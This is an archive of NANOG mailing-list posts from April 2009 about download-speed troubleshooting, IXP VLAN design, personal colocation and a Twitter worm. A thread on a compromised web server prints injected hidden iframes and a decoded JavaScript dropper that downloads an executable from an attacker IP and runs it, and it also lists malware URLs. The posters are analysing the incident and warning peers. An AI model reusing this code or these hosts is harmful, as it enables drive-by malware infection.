--- learn.chan...@gmail.com wrote: From: chandrashakher pawar We are level one ISP. one of my customer is connected to fast ethernet. His link speed 100,000 kbps. while downloading any thing from net he downloading speed donot go above 200 kbps. While doing multiple download he get aroung 200 kbps in every window. But when he close all the windows no change in downloading speed is observed. - You would need to add more info for any meaningful troubleshooting to occur. Do you see errors on the interface? Clear the counters and watch for a while. scott
Re: IXP
On 17.04.2009 23:06 Paul Vixie wrote >> Large IXP have >300 customers. You would need up to 45k vlan tags, >> wouldn't you? > > the 300-peer IXP's i've been associated with weren't quite full mesh > in terms of who actually wanted to peer with whom, so, no. Much depends on your definition of "quite". Would 30% qualify? Arnold -- Arnold Nipper / nIPper consulting, Sandhausen, Germany email: arn...@nipper.de phone: +49 6224 9259 299 mobile: +49 172 2650958 fax: +49 6224 9259 333 signature.asc Description: OpenPGP digital signature
Re: downloading speed
On Fri, Apr 17, 2009 at 5:23 PM, chandrashakher pawar wrote: > our router is C12KPRP-K4P-M > > Please advise what could be the cause? Could you perhaps paste the router configuration in your reply? If you could execute a "wr t" or a "show run", that should provide sufficient information for the proper troubleshooting to take place. Thank you. Paul Wall (Drive Slow)
Re: IXP
> > the 300-peer IXP's i've been associated with weren't quite full mesh > > in terms of who actually wanted to peer with whom, so, no. > > Much depends on your definition of "quite". Would 30% qualify? 30% would be an over-the-top success. has anybody ever run out of 1Q tags in an IXP context?
Re: downloading speed
--- sur...@mauigateway.com wrote: --- learn.chan...@gmail.com wrote: From: chandrashakher pawar While doing multiple download he get aroung 200 kbps in every window. But when he close all the windows no change in downloading speed is observed. - You would need to add more info for any meaningful troubleshooting to occur. Do you see errors on the interface? Clear the counters and watch for a while. - My apologies. I typed too fast. I didn't absorb this part: "While doing multiple download he get aroung 200 kbps in every window." I assume by "window" you mean a web browser. Does this rate limiting happen with other protocols like FTP? scott
Re: Malicious code just found on web server
I took a quick look at the code... formatted it in a pastebin here:
http://pastebin.com/m7b50be54
That javascript writes this to the page (URL obscured):
document.write("");
The 1.2.3.4 in the URL is my public IP address (I changed that).
Below the javascript, it grabs a PDF:
That PDF is on the site, I haven't looked at it yet though.
-ChrisAM
http://securabit.com
On Fri, Apr 17, 2009 at 4:42 PM, Russell Berg wrote:
> FWIW, 77.92.158.122 resolves to mail.yarisfest.com, not mail.yaris.com
>
> -Original Message-
> From: Russell Berg
> Sent: Friday, April 17, 2009 3:39 PM
> To: 'nanog@nanog.org'
> Subject: Malicious code just found on web server
>
> We just discovered what we suspect is malicious code appended to all
> index.html files on our web server as of the 11:00 central time hour today:
>
> src="http://77.92.158.122/webmail/inc/web/index.php";
> style="display: none;" height="0" width="0"> src="http://77.92.158.122/webmail/inc/web/index.php";
> style="display: none;" height="0" width="0">
>
> IP address resolves to mail.yaris.com; couldn't find any A/V site references
> to this.
>
> Google search reveals some Chinese sites with references to the URL today,
> but nothing substantial in the translation.
>
> Just a heads up for folks; we have a team investigating...
>
> Russell Berg
> Dir - Product Development
> Airstream Communications
> b...@wins.net
> 715-832-3726
>
>
>
>
Re: IXP
On 18.04.2009 00:04 Paul Vixie wrote >>> the 300-peer IXP's i've been associated with weren't quite full >>> mesh in terms of who actually wanted to peer with whom, so, no. >> >> Much depends on your definition of "quite". Would 30% qualify? > > 30% would be an over-the-top success. has anybody ever run out of 1Q > tags in an IXP context? Why? You only need 1 ;-) Arnold -- Arnold Nipper / nIPper consulting, Sandhausen, Germany email: arn...@nipper.de phone: +49 6224 9259 299 mobile: +49 172 2650958 fax: +49 6224 9259 333 signature.asc Description: OpenPGP digital signature
Re: downloading speed
chandrashakher pawar wrote: We are level one ISP. one of my customer is connected to fast ethernet. His link speed 100,000 kbps. while downloading any thing from net he downloading speed donot go above 200 kbps. While doing multiple download he get aroung 200 kbps in every window. But when he close all the windows no change in downloading speed is observed. As others have mentioned, duplex mismatch is a good cause. If you have a client with java support, give the NDT a try as this is something it claims to detect: http://ndt.anl.gov:7123/ There's a master site list available here so you may wish to find a closer test site: http://e2epi.internet2.edu/ndt/ndt-server-list.html Caveat: I think most of them are Internet2 only. I know the ANL and CERN sites are accessible to us but didn't try them all. Mike
Re: IXP - PNI
On Fri, Apr 17, 2009 at 04:52:53PM -0500, Joe Greco wrote: > > On Fri, 17 Apr 2009, bmann...@vacation.karoshi.com wrote: > > > the vlan tagging idea is a virtualization of the PNI construct. > > > why use an IX when running 10's/100's/1000's of private network > > > interconnects will do? > > > > > > granted, if out of the 120 ASN's at an IX, 100 are exchanging on > > > average - 80KBs - then its likley safe to dump them all into a single > > > physical port and vlan tag the heck out of it. > > > > > > its those other 20 that demand some special care. > > > > The construct also doesn't scale well for multicast traffic exchange if > > there's a significant number of multicast peers even though the traffic > > might be low for individual source ASNs. On the other hand, if the IXP > > doesn't use IGMP/MLD snooping capable switches, then I suppose it doesn't > > matter. > > Didn't we go through all this with ATM VC's at the AADS NAP, etc? > > ... JG yes indeed. --bill
Re: Malicious code just found on web server
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1
On Fri, Apr 17, 2009 at 3:06 PM, Chris Mills wrote:
> I took a quick look at the code... formatted it in a pastebin here:
> http://pastebin.com/m7b50be54
>
> That javascript writes this to the page (URL obscured):
> document.write(" src=\"hXXp://77.92.158.122/webmail/inc/web/include/spl.php?stat=Unknown|U
> nknown|US|1.2.3.4\" width=\"0\" height=\"0\"
> type=\"application/pdf\">");
>
> The 1.2.3.4 in the URL is my public IP address (I changed that).
>
> Below the javascript, it grabs a PDF:
> style="border:none">
>
> That PDF is on the site, I haven't looked at it yet though.
>
Most likely a file that exploits a well-known vulnerability in Adobe
Reader, which in turn probably loads malware from yet another location.
We've been seeing a lot of this lately.
- - ferg
-BEGIN PGP SIGNATURE-
Version: PGP Desktop 9.5.3 (Build 5003)
wj8DBQFJ6P+Oq1pz9mNUZTMRAgINAJ9nFvTfdP0nNB5IXGCR5U5MKvbBxwCgoZQZ
1dYwVrqBqq9k7RVzAhXtYMY=
=bmbW
-END PGP SIGNATURE-
--
"Fergie", a.k.a. Paul Ferguson
Engineering Architecture for the Internet
fergdawgster(at)gmail.com
ferg's tech blog: http://fergdawg.blogspot.com/
Re: downloading speed
Configuration sh run interface FastEthernet1/3/1 Building configuration... Current configuration : 351 bytes ! interface FastEthernet1/3/1 description CUST:xxx bandwidth 10 ip address 116.0.85.13 255.255.255.252 no ip redirects no ip directed-broadcast load-interval 30 negotiation auto no cdp enable end No errors on the interface. none of our customer on this router has complait us this issue i have changed this to "negotiation auto" as suggested by one of our member. tommorow customer will test again and reply. round-trip-time is good, no bacbone chocked. Unit will not make bit differnce as: The customer tried troubleshooting the issue after connecting laptop directily to the 100 mbps link. In that case also the result was same. Regards Chandrashakher Pawar IPNOC Customer & Services Operations Tata communication AS6453 mobil + 91 9225633948 + 91 9324509268 learn.chan...@gmail.com On Fri, Apr 17, 2009 at 10:57 PM, Scott Weeks wrote: > > > --- learn.chan...@gmail.com wrote: > From: chandrashakher pawar > > We are level one ISP. one of my customer is connected to fast ethernet. > His link speed 100,000 kbps. while downloading any thing from net he > downloading speed donot go above 200 kbps. > While doing multiple download he get aroung 200 kbps in every window. But > when he close all the windows no change in downloading speed is observed. > - > > > You would need to add more info for any meaningful troubleshooting to > occur. Do you see errors on the interface? Clear the counters and watch > for a while. > > scott > > <>
Re: downloading speed
Have him do a traceroute from his PC or router to where he is trying to download from. Where is it choking? On Fri, Apr 17, 2009 at 3:21 PM, chandrashakher pawar < learn.chan...@gmail.com> wrote: > Configuration > > sh run interface FastEthernet1/3/1 > Building configuration... > Current configuration : 351 bytes > ! > interface FastEthernet1/3/1 > description CUST:xxx > bandwidth 10 > ip address 116.0.85.13 255.255.255.252 > no ip redirects > no ip directed-broadcast > load-interval 30 > negotiation auto > no cdp enable > end > > No errors on the interface. > none of our customer on this router has complait us this issue > i have changed this to "negotiation auto" as suggested by one of our > member. > tommorow customer will test again and reply. > round-trip-time is good, no bacbone chocked. > Unit will not make bit differnce as: The customer tried troubleshooting the > issue after connecting laptop directily to the 100 mbps link. > In that case also the result was same. > > Regards > Chandrashakher Pawar > IPNOC > Customer & Services Operations > Tata communication AS6453 > mobil + 91 9225633948 + 91 9324509268 > learn.chan...@gmail.com > > > > > > > > On Fri, Apr 17, 2009 at 10:57 PM, Scott Weeks >wrote: > > > > > > > --- learn.chan...@gmail.com wrote: > > From: chandrashakher pawar > > > > We are level one ISP. one of my customer is connected to fast ethernet. > > His link speed 100,000 kbps. while downloading any thing from net he > > downloading speed donot go above 200 kbps. > > While doing multiple download he get aroung 200 kbps in every window. But > > when he close all the windows no change in downloading speed is observed. > > - > > > > > > You would need to add more info for any meaningful troubleshooting to > > occur. Do you see errors on the interface? Clear the counters and watch > > for a while. > > > > scott > > > > >
Re: Malicious code just found on web server
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1
On Fri, Apr 17, 2009 at 3:15 PM, Paul Ferguson
wrote:
>
> On Fri, Apr 17, 2009 at 3:06 PM, Chris Mills
> wrote:
>
>> I took a quick look at the code... formatted it in a pastebin here:
>> http://pastebin.com/m7b50be54
>>
>> That javascript writes this to the page (URL obscured):
>> document.write("> src=\"hXXp://77.92.158.122/webmail/inc/web/include/spl.php?stat=Unknown|
>> U nknown|US|1.2.3.4\" width=\"0\" height=\"0\"
>> type=\"application/pdf\">");
>>
>> The 1.2.3.4 in the URL is my public IP address (I changed that).
>>
>> Below the javascript, it grabs a PDF:
>> > style="border:none">
>>
>> That PDF is on the site, I haven't looked at it yet though.
>>
>
> Most likely a file that exploits a well-known vulnerability in Adobe
> Reader, which in turn probably loads malware from yet another location.
>
> We've been seeing a lot of this lately.
>
Yes, definitely malicious:
http://www.virustotal.com/analisis/89db7dec6cc786227462c947e4cb4a9b
- - ferg
-BEGIN PGP SIGNATURE-
Version: PGP Desktop 9.5.3 (Build 5003)
wj8DBQFJ6QMwq1pz9mNUZTMRAqJZAKCEkD0KcifnJIhtex4nP6grIFGKzwCgnE1w
/K0hKsJiAz4RGu8VQkyP+js=
=AzJq
-END PGP SIGNATURE-
--
"Fergie", a.k.a. Paul Ferguson
Engineering Architecture for the Internet
fergdawgster(at)gmail.com
ferg's tech blog: http://fergdawg.blogspot.com/
Re: Malicious code just found on web server
You beat me to it.
-ChrisAM
On Fri, Apr 17, 2009 at 6:31 PM, Paul Ferguson wrote:
> -BEGIN PGP SIGNED MESSAGE-
> Hash: SHA1
>
> On Fri, Apr 17, 2009 at 3:15 PM, Paul Ferguson
> wrote:
>
>>
>> On Fri, Apr 17, 2009 at 3:06 PM, Chris Mills
>> wrote:
>>
>>> I took a quick look at the code... formatted it in a pastebin here:
>>> http://pastebin.com/m7b50be54
>>>
>>> That javascript writes this to the page (URL obscured):
>>> document.write(">> src=\"hXXp://77.92.158.122/webmail/inc/web/include/spl.php?stat=Unknown|
>>> U nknown|US|1.2.3.4\" width=\"0\" height=\"0\"
>>> type=\"application/pdf\">");
>>>
>>> The 1.2.3.4 in the URL is my public IP address (I changed that).
>>>
>>> Below the javascript, it grabs a PDF:
>>> >> style="border:none">
>>>
>>> That PDF is on the site, I haven't looked at it yet though.
>>>
>>
>> Most likely a file that exploits a well-known vulnerability in Adobe
>> Reader, which in turn probably loads malware from yet another location.
>>
>> We've been seeing a lot of this lately.
>>
>
> Yes, definitely malicious:
>
> http://www.virustotal.com/analisis/89db7dec6cc786227462c947e4cb4a9b
>
> - - ferg
>
> -BEGIN PGP SIGNATURE-
> Version: PGP Desktop 9.5.3 (Build 5003)
>
> wj8DBQFJ6QMwq1pz9mNUZTMRAqJZAKCEkD0KcifnJIhtex4nP6grIFGKzwCgnE1w
> /K0hKsJiAz4RGu8VQkyP+js=
> =AzJq
> -END PGP SIGNATURE-
>
>
>
> --
> "Fergie", a.k.a. Paul Ferguson
> Engineering Architecture for the Internet
> fergdawgster(at)gmail.com
> ferg's tech blog: http://fergdawg.blogspot.com/
>
Re: Malicious code just found on web server
Nice, bad code is actually on all of the error (404) pages for the site as
well as some other php pages.
The code is actually a base64 obfuscation technique to hide the actual
attack code.
Once decode the code attempts multiple attacks to try and get the victim to
download an executable
hxxp://77.92.158.122/webmail/inc/web/load.php
Virustotal results (3/40)
http://www.virustotal.com/analisis/180fc9b96543139b8328f2ae0a2d1bf3
Also this code appears to be trying to exploit specific browser types
(Chrome and Mozilla in particular) as can be seen from this code snippet of
the decode.
(Commented out each line just in case someone has a browser that will try
and render this)
//aaa_2626aKiupwzqp.setAttribute("style", "display: none; -moz-binding:
url('chrome://xbl-marquee/content/xbl-marquee.xml#marquee-horizontal');");
//document.body.appendChild(aaa_2626aKiupwzqp);
//var aaa_2626aLiupwzqp = aaa_2626aKiupwzqp.stop.eval.call(null,
"Function");
//var aaa_2626aMiupwzqp = aaa_2626aLiupwzqp("return function(C){ var
//file=C.classes['@
mozilla.org/file/local;1'].createInstance(C.interfaces.nsILocalFile);
file.initW
//ithPath('c:\\" + aaa_2626aHiupwzqp + ".exe'); return file; }")();
//window.file = aaa_2626aMiupwzqp(Components);
//var aaa_2626aNiupwzqp = aaa_2626aLiupwzqp("return function(C){ return
C.classes['@
mozilla.org/process/util;1'].createInstance(C.interfaces.nsIProcess);
//}")();
//window.process = aaa_2626aNiupwzqp(Components);
//var aaa_2626aOiupwzqp = aaa_2626aLiupwzqp("return function(C,file){
//io=C.classes['@
mozilla.org/network/io-service;1'].getService(C.interfaces.nsIIOService);source=i
//o.newURI('http://77.92.158.122/webmail/inc/web/load.php
','UTF8',null);persist=C.classes['@
mozilla.org/embedding/browser/nsWebBrowserPersist;1'].createI//nstance(C.int
//erfaces.nsIWebBrowserPersist);persist.persistFlags=8192|4096;persist.saveURI(source,null,null,null,null,file);
return persist; }")();
//window.persist = aaa_2626aOiupwzqp(Components,window.file);
//window.getState = aaa_2626aLiupwzqp("return function(persist) { return
persist.currentState; }")();
//window.processRun = aaa_2626aLiupwzqp("return function(process,file) {
process.init(file); process.run(false,[],0); }")();
Also attempts to download a hostile PDF file from a subdirectory underneath
this one which was created with a demo copy of Foxit.
hxxp://77.92.158.122/webmail/inc/web/include/two.pdf
INFO:
Version 2.321001 (possibly)
Created: 2009-02-19 1448hrs (-2 timezone)
There appear to be several other attacks within this code I can upload or
update this thread if you are interested in the other attacks.
Jake
On Fri, Apr 17, 2009 at 6:34 PM, Chris Mills wrote:
> You beat me to it.
>
> -ChrisAM
>
> On Fri, Apr 17, 2009 at 6:31 PM, Paul Ferguson
> wrote:
> > -BEGIN PGP SIGNED MESSAGE-
> > Hash: SHA1
> >
> > On Fri, Apr 17, 2009 at 3:15 PM, Paul Ferguson
> > wrote:
> >
> >>
> >> On Fri, Apr 17, 2009 at 3:06 PM, Chris Mills
> >> wrote:
> >>
> >>> I took a quick look at the code... formatted it in a pastebin here:
> >>> http://pastebin.com/m7b50be54
> >>>
> >>> That javascript writes this to the page (URL obscured):
> >>> document.write(" >>> src=\"hXXp://
> 77.92.158.122/webmail/inc/web/include/spl.php?stat=Unknown|
> >>> U nknown|US|1.2.3.4\" width=\"0\" height=\"0\"
> >>> type=\"application/pdf\">");
> >>>
> >>> The 1.2.3.4 in the URL is my public IP address (I changed that).
> >>>
> >>> Below the javascript, it grabs a PDF:
> >>> >>> style="border:none">
> >>>
> >>> That PDF is on the site, I haven't looked at it yet though.
> >>>
> >>
> >> Most likely a file that exploits a well-known vulnerability in Adobe
> >> Reader, which in turn probably loads malware from yet another location.
> >>
> >> We've been seeing a lot of this lately.
> >>
> >
> > Yes, definitely malicious:
> >
> > http://www.virustotal.com/analisis/89db7dec6cc786227462c947e4cb4a9b
> >
> > - - ferg
> >
> > -BEGIN PGP SIGNATURE-
> > Version: PGP Desktop 9.5.3 (Build 5003)
> >
> > wj8DBQFJ6QMwq1pz9mNUZTMRAqJZAKCEkD0KcifnJIhtex4nP6grIFGKzwCgnE1w
> > /K0hKsJiAz4RGu8VQkyP+js=
> > =AzJq
> > -END PGP SIGNATURE-
> >
> >
> >
> > --
> > "Fergie", a.k.a. Paul Ferguson
> > Engineering Architecture for the Internet
> > fergdawgster(at)gmail.com
> > ferg's tech blog: http://fergdawg.blogspot.com/
> >
>
>
Re: downloading speed
Several windows in the same PC, doing file transfer in parallel, each get the same speed as one. The speed is peaking at some specific speed every single time, and the several windows reach this peak. I smell classic TCP window size bumping into (bandwidth x delay). Have you tried with iperf, using UDP ? Mike Lyon wrote: Have him do a traceroute from his PC or router to where he is trying to download from. Where is it choking? On Fri, Apr 17, 2009 at 3:21 PM, chandrashakher pawar < learn.chan...@gmail.com> wrote: Configuration sh run interface FastEthernet1/3/1 Building configuration... Current configuration : 351 bytes ! interface FastEthernet1/3/1 description CUST:xxx bandwidth 10 ip address 116.0.85.13 255.255.255.252 no ip redirects no ip directed-broadcast load-interval 30 negotiation auto no cdp enable end No errors on the interface. none of our customer on this router has complait us this issue i have changed this to "negotiation auto" as suggested by one of our member. tommorow customer will test again and reply. round-trip-time is good, no bacbone chocked. Unit will not make bit differnce as: The customer tried troubleshooting the issue after connecting laptop directily to the 100 mbps link. In that case also the result was same. Regards Chandrashakher Pawar IPNOC Customer & Services Operations Tata communication AS6453 mobil + 91 9225633948 + 91 9324509268 learn.chan...@gmail.com On Fri, Apr 17, 2009 at 10:57 PM, Scott Weeks wrote: --- learn.chan...@gmail.com wrote: From: chandrashakher pawar We are level one ISP. one of my customer is connected to fast ethernet. His link speed 100,000 kbps. while downloading any thing from net he downloading speed donot go above 200 kbps. While doing multiple download he get aroung 200 kbps in every window. But when he close all the windows no change in downloading speed is observed. - You would need to add more info for any meaningful troubleshooting to occur. Do you see errors on the interface? Clear the counters and watch for a while. scott
Re: downloading speed
Based on the screen shot he's getting, 1536 bps or 192KB. Also if he is opening several windows but downloading from the same source it may be a congestion control mechanism on the server or hosting provider side. What's the utilization on the RT, DSLAM and BRAS, all factors to performance. Bill On Fri, Apr 17, 2009 at 4:21 PM, chandrashakher pawar < learn.chan...@gmail.com> wrote: > Configuration > > sh run interface FastEthernet1/3/1 > Building configuration... > Current configuration : 351 bytes > ! > interface FastEthernet1/3/1 > description CUST:xxx > bandwidth 10 > ip address 116.0.85.13 255.255.255.252 > no ip redirects > no ip directed-broadcast > load-interval 30 > negotiation auto > no cdp enable > end > > No errors on the interface. > none of our customer on this router has complait us this issue > i have changed this to "negotiation auto" as suggested by one of our > member. > tommorow customer will test again and reply. > round-trip-time is good, no bacbone chocked. > Unit will not make bit differnce as: The customer tried troubleshooting the > issue after connecting laptop directily to the 100 mbps link. > In that case also the result was same. > > Regards > Chandrashakher Pawar > IPNOC > Customer & Services Operations > Tata communication AS6453 > mobil + 91 9225633948 + 91 9324509268 > learn.chan...@gmail.com > > > > > > > > On Fri, Apr 17, 2009 at 10:57 PM, Scott Weeks >wrote: > > > > > > > --- learn.chan...@gmail.com wrote: > > From: chandrashakher pawar > > > > We are level one ISP. one of my customer is connected to fast ethernet. > > His link speed 100,000 kbps. while downloading any thing from net he > > downloading speed donot go above 200 kbps. > > While doing multiple download he get aroung 200 kbps in every window. But > > when he close all the windows no change in downloading speed is observed. > > - > > > > > > You would need to add more info for any meaningful troubleshooting to > > occur. Do you see errors on the interface? Clear the counters and watch > > for a while. > > > > scott > > > > >
US west coast personal colo
Is anyone still doing personal colo on the west coast? I'm looking for a new home for my personal server on the west coast, and it seems like the economy has taken out most of the old personal colo offers. Even the old web page on www.vix.com/personalcolo is gone.
Re: US west coast personal colo
On Fri, Apr 17, 2009 at 06:50:42PM -0400, Sean Donelan wrote:A > > Is anyone still doing personal colo on the west coast? I'm looking for a > new home for my personal server on the west coast, and it seems like > the economy has taken out most of the old personal colo offers. > Even the old web page on www.vix.com/personalcolo is gone. > A there are a few of us still around. --bill
Re: IXP
>> with the advent of vlan tags, the whole idea of CSMA for IXP networks >> is passe. just put each pair of peers into their own private tagged >> vlan and let one of them allocate a V4 /30 and a V6 /64 for it. as a >> bonus, this prevents third party BGP (which nobody really liked which >> sometimes got turned on by mistake) and prevents transit dumping >> and/or "pointing default at" someone. the IXP no longer needs any >> address space, they're just a VPN provider. shared-switch >> connections are just virtual crossconnects. > Large IXP have >300 customers. You would need up to 45k vlan tags, > wouldn't you? now arnold, you're spoiling a great idea. researchers could measure the exchnge to see if it ever fully converged (to steal a routing term). nice paper there, and who cares about working connectivity. randy
Re: IXP
On Fri, Apr 17, 2009 at 04:10:32PM -0500, Richard A Steenbergen wrote: > A far better way to implement this is with a web portal brokered virtual > crossconnect system, which provisions MPLS martini pwe or vpls circuits > between members. A couple of years ago I thought of the same, and discovered that some new MAEs were (supposed to be?) built on exactly that scheme. Hard to have really new ideas these days. :) http://meetings.apnic.net/meetings/19/docs/sigs/ix/ix-pres-bechly-mae-ext-services.pdf Best regards, Daniel -- CLUE-RIPE -- Jabber: d...@cluenet.de -- d...@ircnet -- PGP: 0xA85C8AA0
Re: Personal Colo Referral
Here is place for good rates and a good colo facility - http://unixmechanix.com/ And Nathan's personal blog - http://mybrainhurts.com/blog/ Eddy On Apr 17, 2009, at 4:05 PM, Eddy Martinez wrote: Hi Sean, I saw your request on the Nanog list. I use and know Nathan in San diego - Nathan Hubbard - nat...@unixmechanix.com And his personal site - http://mybrainhurts.com/blog/ Good rates and good colo. Eddy
Re: US west coast personal colo
On 4/17/09 4:50 PM, Sean Donelan wrote: Is anyone still doing personal colo on the west coast? I'm looking for a new home for my personal server on the west coast, and it seems like the economy has taken out most of the old personal colo offers. Even the old web page on www.vix.com/personalcolo is gone. Depending on needs, I do have some space open in Tacoma for 1U or 2U servers. Plus we also have a Xen hosting platform in development. We aren't doing this for profit - just looking to make enough to be self sustaining and moving to a full cabinet. -- Brielle Bruns The Summit Open Source Development Group http://www.sosdg.org/ http://www.ahbl.org
Re: downloading speed
chandrashakher pawar wrote: No errors on the interface. none of our customer on this router has complait us this issue i have changed this to "negotiation auto" as suggested by one of our member. tommorow customer will test again and reply. round-trip-time is good, no bacbone chocked. Unit will not make bit differnce as: The customer tried troubleshooting the issue after connecting laptop directily to the 100 mbps link. In that case also the result was same. Note that your screenshot displays bytes, not bits. So it will display one-eighth the download speed measured in bits. Check the TCP tuning on the downloading PC. The fact that multiple windows achieve a higher aggregate speed points to this. Use the Google link I supplied earlier, also search "Bandwidth-delay product". Are both ends of the link a substantial geographic distance (several miles) apart? Note that the adjustments for TCP tuning are to the TCP stack on the machine doing the download, not the network gear. -- Jay Hennigan - CCIE #7880 - Network Engineering - j...@impulse.net Impulse Internet Service - http://www.impulse.net/ Your local telephone and internet company - 805 884-6323 - WB6RDV
Re: IXP
Arnold Nipper writes: > On 18.04.2009 00:04 Paul Vixie wrote > >> ... has anybody ever run out of 1Q tags in an IXP context? > > Why? You only need 1 ;-) really? 1? at PAIX we started with three, two unicast (wrongheadedness) and one multicast, then added another unicast for V6. then came the VNI's, so i'm betting there are hundreds or thousands at most PAIX nodes today. are others just using one big shared network for everything? i should expand on something i said earlier on this thread. the progression i saw at PAIX and later saw from inside MFN was that most new peerings would happen on a shared port and then as that port filled up some peerings would move to PNI. given that success in these terms looks like a PNI, i'm loathe to build in any dependencies on the long term residency of a given peering on a shared multiaccess subnet. i should answer something said earlier: yes there's only 14 bits of tag and yes 2**14 is 4096. in the sparsest and most wasteful allocation scheme, tags would be assigned 7:7 so there'd be a max of 64 peers. it's more likely that tags would be assigned by increment, but it's still nowhere near enough for 300+ peers. however, well before 300 peers, there'd be enough staff and enough money to use something other than a switch in the middle, so that the "tagspace" would be per-port rather than global to the IXP. Q in Q is not how i'd build this... cisco and juniper both have hardware tunnelling capabilities that support this stuff... it just means as the IXP fabric grows it has to become router-based. i've spent more than several late nights and long weekends dealing with the problems of shared multiaccess IXP networks. broadcast storms, poisoned ARP, pointing default, unintended third party BGP, unintended spanning tree, semitranslucent loops, unauthorized IXP LAN extension... all to watch the largest flows move off to PNI as soon as somebody's port was getting full. conventional wisdom says a shared fabric is fine. conventional wisdom also said that UNIX came only from bell labs, that computers and operating systems were bought from the same vendor on a single PO, that protocols built for T1 customers who paid $1000 MRC would scale to DSL customers who paid $30 MRC, that Well and Portal shell users should be allowed to use outbound SMTP, that the internet would only be used cooperatively, and that business applications were written in COBOL whereas scientific applications were written in FORTRAN, and that the cool people all used BSD whereas Linux was just a toy. so i think conventional wisdom isn't perfectly ageless. -- Paul Vixie
Re: downloading speed
Duplex Mismatch looks to be the problem. On Fri, Apr 17, 2009 at 3:23 PM, chandrashakher pawar < learn.chan...@gmail.com> wrote: > Dear Group member, > > We are level one ISP. one of my customer is connected to fast ethernet. > His link speed 100,000 kbps. while downloading any thing from net he > downloading speed donot go above 200 kbps. > While doing multiple download he get aroung 200 kbps in every window. But > when he close all the windows no change in downloading speed is observed. > > our router is C12KPRP-K4P-M > > Please advise what could be the cause? > > -- > Regards > > Chandrashakher Pawar > IPNOC > Customer & Services Operations > Tata communication AS6453 > mobil + 91 9225633948 + 91 9324509268 > learn.chan...@gmail.com > -- -B
www.vix.com/personalcolo (Re: US west coast personal colo)
i just restored http://www.vix.com/personalcolo/ from backup. last update 2007. i guess this calls for another round of "send me your updates, folks." re: Sean Donelan writes: > Is anyone still doing personal colo on the west coast? I'm looking for a > new home for my personal server on the west coast, and it seems like > the economy has taken out most of the old personal colo offers. Even the > old web page on www.vix.com/personalcolo is gone. > > > -- Paul Vixie
Michael Mooney releases another worm: Law Enforcement / Intelligence Agency's do nothing
by n3td3v April 17, 2009 5:43 PM PDT "The teenager who takes credit for the worms that hit Twitter earlier this week has been hired by a Web application development firm and on Friday released a fifth worm on the microblogging site, he said." I hope the FBI nip him in the bud, this cannot continue, this needs to be made an example of. I want Law enforcement / Intelligence agency's to take control of the situation, now. http://news.cnet.com/8618-1009_3-10222373.html?communityId=2114&targetCommunityId=2114&blogId=83&messageId=7821482&tag=mncol;tback I want this individual made an example of and im not joking. Many thanks, Andrew Intelligencer & Founder of n3td3v British
Re: Malicious code just found on web server
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1
On Fri, Apr 17, 2009 at 3:06 PM, Chris Mills wrote:
>> I took a quick look at the code... formatted it in a pastebin here:
>> http://pastebin.com/m7b50be54
>>
>> That javascript writes this to the page (URL obscured):
>> document.write("> src=\"hXXp://77.92.158.122/webmail/inc/web/include/spl.php?stat=Unknown|
>> U nknown|US|1.2.3.4\" width=\"0\" height=\"0\"
>> type=\"application/pdf\">");
>>
>> The 1.2.3.4 in the URL is my public IP address (I changed that).
>>
>> Below the javascript, it grabs a PDF:
>> > style="border:none">
>>
>> That PDF is on the site, I haven't looked at it yet though.
>>
Not only is that .pdf malicious, when "executed" it also fetches additional
malware from:
hxxp:// test1.ru /1.1.1/load.php
If that host is not in your block list, it should be -- known purveyor of
crimeware.
This is in addition to the other malicious URLs mentioned in this thread.
- - ferg
-BEGIN PGP SIGNATURE-
Version: PGP Desktop 9.5.3 (Build 5003)
wj8DBQFJ6Seaq1pz9mNUZTMRAsePAJ4ltJybvyViJoiTJDbIN9JCMjbZtgCgtOnI
mxM8Ci/feKnJe6M6qbiESPw=
=b0Yj
-END PGP SIGNATURE-
--
"Fergie", a.k.a. Paul Ferguson
Engineering Architecture for the Internet
fergdawgster(at)gmail.com
ferg's tech blog: http://fergdawg.blogspot.com/
Re: Michael Mooney releases another worm: Law Enforcement / Intelligence Agency's do nothing
andrew.wallace wrote: I want this individual made an example of and im not joking. And I'd like an example made of companies that ignore reports of security flaws and leave their customers open to such worms; not to mention giving the impression to misguided teenagers that the only way they will be heard is to release a worm. Historically, I believe some companies have ignored security concerns until someone (sometimes non-maliciously) released a worm. Of course, even non-malicious worms can have unpredictable results which result in catastrophic behavior. The earliest examples predate my residence on the network, but I've read a small bug made them extremely bad. Jack
Re: Michael Mooney releases another worm: Law Enforcement / Intelligence Agency's do nothing
So if Al-Qaeda blow up a shopping centre and the guy who masterminded it turns out to be 17 he gets a job in MI5? OH MY GOD. On Sat, Apr 18, 2009 at 2:28 AM, Jack Bates wrote: > andrew.wallace wrote: >> >> I want this individual made an example of and im not joking. >> > > And I'd like an example made of companies that ignore reports of security > flaws and leave their customers open to such worms; not to mention giving > the impression to misguided teenagers that the only way they will be heard > is to release a worm. > > Historically, I believe some companies have ignored security concerns until > someone (sometimes non-maliciously) released a worm. Of course, even > non-malicious worms can have unpredictable results which result in > catastrophic behavior. The earliest examples predate my residence on the > network, but I've read a small bug made them extremely bad. > > Jack > >
Re: Michael Mooney releases another worm: Law Enforcement / Intelligence Agency's do nothing
And I want cnet to not report this crap. They glamorise it. --Original Message-- From: andrew.wallace To: nanog@nanog.org To: n3td3v Subject: Re: Michael Mooney releases another worm: Law Enforcement / Intelligence Agency's do nothing Sent: Apr 17, 2009 18:38 So if Al-Qaeda blow up a shopping centre and the guy who masterminded it turns out to be 17 he gets a job in MI5? OH MY GOD. On Sat, Apr 18, 2009 at 2:28 AM, Jack Bates wrote: > andrew.wallace wrote: >> >> I want this individual made an example of and im not joking. >> > > And I'd like an example made of companies that ignore reports of security > flaws and leave their customers open to such worms; not to mention giving > the impression to misguided teenagers that the only way they will be heard > is to release a worm. > > Historically, I believe some companies have ignored security concerns until > someone (sometimes non-maliciously) released a worm. Of course, even > non-malicious worms can have unpredictable results which result in > catastrophic behavior. The earliest examples predate my residence on the > network, but I've read a small bug made them extremely bad. > > Jack > > Sent via BlackBerry from T-Mobile
Re: Michael Mooney releases another worm: Law Enforcement / Intelligence Agency's do nothing
